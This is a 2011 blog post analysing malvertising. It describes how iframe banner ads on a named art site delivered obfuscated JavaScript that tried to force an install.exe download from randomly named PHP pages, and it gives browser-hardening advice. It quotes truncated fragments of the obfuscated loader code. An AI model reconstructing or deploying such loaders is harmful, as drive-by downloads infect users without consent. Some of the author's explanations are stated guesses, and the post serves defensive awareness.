by   May 23 2011   
How Popups and Pop Unders install viruses on your computer while surfing the internet. In Advertisements that use external sites with embedded Iframes the site delivering the malware or virus might use the following system to go undetected by normal detection applications by the sites advertising.

How Popups and Pop Unders install viruses on your computer while surfing the internet

Before you can stop a virus from installing into a computer you need to understand how they are distributed.

Once you learn more about the delivery functions you can start setting your computer to better defend itself from attacks.

In this example I'll be using a live site that is located in Turkey and used actively with major advertisement banners.

Before you visit the site you need to setup your browser to match how my virus test system is set.
ActiveX controls need to be all disabled.
Scripting of all types needs to be disabled.
Set to warn on redirect.
In short disable everything in your browser that would run any application.

In Advertisements that use external sites with embedded Iframes the site delivering the malware or virus might use the following system to go undetected by normal detection applications by the sites advertising.




var seq = ["S","w","J","u","s","L","q","k","i","W","x","n" ,"B","A","M","a","R","j","g","C","N","Q","I","t" ,"V","e", "U","P","K","z","r","c","T","p","l", "h","y","E","d","D","m","H","X","b","Y","G","F" ,"Z","o","O","f","v"], shift = 29;
var d_e5ba99c32 = 'e_e5ba99.php';

var cc = 1, ee = 1;


The first string sets up a random php page that holds the install.exe file for download.
The following script function is to take advantage of browser exploits to force the load of the install.exe package without detection.
I've cut this down from the 29,000+ characters.
These characters are loaded into a var which I believe is used to overwhelm the browsers.
I have come to this conclusion because the characters generated are random and not encoded scripts.

Test one site :

var d_490bd6 = '4_490bd6.php';
(function() {
var temp="",i,pass2 = "",sou="";
var x304c1e = "60$100$98$84$120$72$75$32$75$118$72$115$61$34$75$115$79$75$4 7$77$119$97$119$100$98$
84$120$72$75$34$62$97$119$84$32$ 85$120$100$75$8 7$119$78$115$32$61$32$87$115 $101$32$66$84$84$119$118$
40$39$36$101$120$87$87$ 75$36$39$44$32$39$51$55$39$44$ 32$39$49$50$53$50$48$56$53$48$39$44$32$39$54$75


Test two same site:
(by refreshing the browser the code changed to the following)

var d_e124e6ef = 'e_e124e6.php'
(function() {
var temp="",i,pass2 = "",sou="";
var x497 = "60&&83&&101&&109&&68&&85&&106&&32&&106&&122 &&85&&69&&61&&34&&106&&69&&78&&106&&47&& 66&&116&&89&&116&&83&&101&&109&&68&&85&&1 06&&34&&62&&89&&116&&109&&32&&102&&68&&83& &106&&86&&116&&118&&69&&32&&61&&32&&86&&69 &&100&&32&&105&&109&&109&&116&&122&&40&&39&&36


Refreshing the browser once more resulted in the following code:

var d_e4da416a = '2_2ee665.php'+'?af'+'fid=';
var temp="",i,out="";
var x5b61 = "60.(#(115.(#(99.(#(114.(#(105. (#(112.(#(116.(#(32.(#(116.(#(121.(#(112.(#(1


The only thing that I see in common is that every time I refreshed the page the var attempted to load over 29,000 characters and attempted to launch the download of the install.exe file which was hidden in the random file x.php.

1. 4_490bd6.php
2. e_e124e6.php
3. 2_2ee665.php

Files 1, 2 and 3 all were the same but the file name was created by a randomize script.
I believe this method was used to trick tracking of the actual file location because once the page has been refreshed the page sent prior is removed.

This was tested by refreshing then attempting to download the file. Each test resulted in a page not found.
But when the page was hit and the source read before refreshing I was able to download the file.

How does this work within advertisements?

Many ads offer Image, Flash and embedded HTML.
When HTML is used by the advertiser the feed typically is from a temporary location. This is to keep ad blockers from stopping the advertisement in some cases.

When the site is linked to an Iframe then a second Iframe is used to actually delivery the content most ad blockers are useless at this point.

My theory regarding this method is that media advertisers restrict the content enough that some advertisers use iframes to change the ad to better suit the company after the first advertisement was approved.

To do this they would need to use third party sites or iframes.
I have not seen any viruses downloaded from anything other than html iframed advertisements. But this doesn't mean that a virus can not be downloaded from a swf (flash) advertisement.

Once the advertisement has delivered it's payload to a specific number of PC's they could switch to the valid advertisement by making a change to the content location.

I have seen this first hand from AntiSpyware companies with popunder banner advertisements. They would run the advertisement a few times then stop the secondary download script. This could be triggered by errors or by the success of the download.

A banner on Coupons.com infected a computer with a online poker site which wasn't one of the major ones but the advert installed and ran without the computer users permission.

It's a violation of your privacy to be infected this way and the advertisers that offer iframes or ads work much in the same way as I listed.

The above samples came from a virus advertisement that was displayed on a popular social network for art. http://www.deviantart.com

It is clear they have issues with banner advertisements by what they technical support said and from the link they offered to report the advertisement.


quote:
------------------------- ------------------------------------------ -------------

Submit a deviantART Advertising Complaint
http://spreadsheets.google.com/viewform?key=pgI_7tRdDtfTLK0L1ZJ5VYw

--------------------------------------------------------- -----------------------

 

If you look at the drop down list from the report form you'll find;

quote:
------------------------------------------------------------------ --------------

pop-up / pop-under
Virus / Worm
Malicious re-direct
Inappropriate Content

--------------------------------------------------------------------------------

 

This gives me the impression they process many reports.
My advice would be to disable all scripting on the deviantart.com website. This will not stop you from surfing or browsing the site it will only stop the active content like their advertisements.

I've posted topics like this before mostly in the forums of the sites that were infected with virus advertisements and each one has responded with the same corporate script:


quote:
--------------------------------------------------------------------------------

Please note we have very strict guidelines for all of our advertising partners and we don’t allow any forms of “viruses” to run on dA. We would never, ever, knowingly run anything that is remotely malicious on the site.

--------------------------------------------------------------------------------

 

Each site claims not to know about these viruses but have channels to take virus advertisement complaints.
Each site says they have strict guidelines for advertisers but do nothing for long periods of time.
The Digitalspy.com post (http://www.digitalspy.co.uk/forums/showthread.php?t=237547&highlight=muraz) was the second attempt to bring attention to the issue of advertisements infecting computers.
The posted link above was my second attempt after the moderaters deleted my first post.

In the case of deviantART my noticed was posted as resolved.

The issues good computer users have today is what I posted here.
If the URL/ Page / Delivery Function / Iframe of the advertisement changes by the time it's reported the persons in power to remove the amoderatorsdvertisement see nothing wrong and let it continue.

It isn't until people like me post up how to turn off scripts and still be able to use the site for what it was built.
You can even install firewalls with ad blockers that will cut out all of their advertisements.

It isn't good business to not follow up on reports of confirmed viruses in advertisements so consumers should do the following to remove the threat from advertisement banners.

ActiveX Controls and Plug-ins
Disable all.
Java VM
Disable or prompt
Scripting
Active disable
disable all.

Once you disable the scripts you'll notice sites change.
You can then add sites you visit to your safe zones or trusted sites.
But keep in mind that many large social networking sites you think you can trust will have malware advertisements attempting to infect your computer. It's best to Not Trust sites other than your bank and your software vendor.

In fact if you ever have read any of my phishing site reports you would know if your scripts were all disabled you would see the site is not your bank because the URLs would not be linked to your bank in your trusted sites list under Security in Internet Options.

That's about it for this report.
Be safe when surfing.
Keep your firewall and AV a third party software application.
Update daily and scan daily.

You'll get a virus sooner or later but the impact will be minimum if you follow simple rules. 

How Popups and Pop Unders install viruses on your computer while surfing the internet. In Advertisements that use external sites with embedded Iframes the site delivering the malware or virus might use the following system to go undetected by normal detection applications by the sites advertising.